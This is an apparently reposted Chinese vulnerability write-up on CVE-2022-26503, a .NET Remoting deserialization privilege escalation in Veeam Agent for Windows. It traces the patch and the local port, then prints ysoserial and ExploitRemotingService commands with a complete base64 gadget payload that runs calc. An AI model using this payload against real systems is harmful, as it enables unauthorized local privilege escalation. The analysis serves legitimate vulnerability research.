CTF导航 CTF导航

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

渗透技巧 3年前 (2022) admin
569 0 0

 

漏洞分析

补丁

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTcpChannelOptions)

用CBinaryServerFormatterSink新的反序列化类替换TypeFilterLevel.Full。

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

需要用户账号密码。port向上追溯

Veeam.Backup.Common.COptions.BackupServerPort

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

从注册表取值9395

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

在日志中发现C:\ProgramData\Veeam\Endpoint\Svc.VeeamEndpointBackup.log只监听了127.0.0.1,所以只能本地提权用。

继续找一下rem的地址 VeeamService

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

利用

使用https://github.com/tyranid/ExploitRemotingService直接打

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter -c calc
ExploitRemotingService.exe --secure --user .\administrator --pass admin16!@#  -useser tcp://127.0.0.1:9395/VeeamService raw AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAsgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYyIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L
BASH

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

原文始发于Y4er:CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

版权声明:admin 发表于 2022年3月23日 下午1:45。
转载请注明:CVE-2022-26503 Veeam Agent for Microsoft Windows LPE | CTF导航

相关文章

jEG – 高度自定义的 Java 回显生成工具
admin
282
钓鱼新姿势,在伪装成pdf的doc文档执行宏代码
admin
378
一堆來不及做的 web 與 XSS 題目
admin
120
每日安全动态推送(8-15)
admin
181
5 anti-forensics techniques to trick investigators (+ examples & detection tips)
admin
337
74cms后台rce分析
admin
567

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0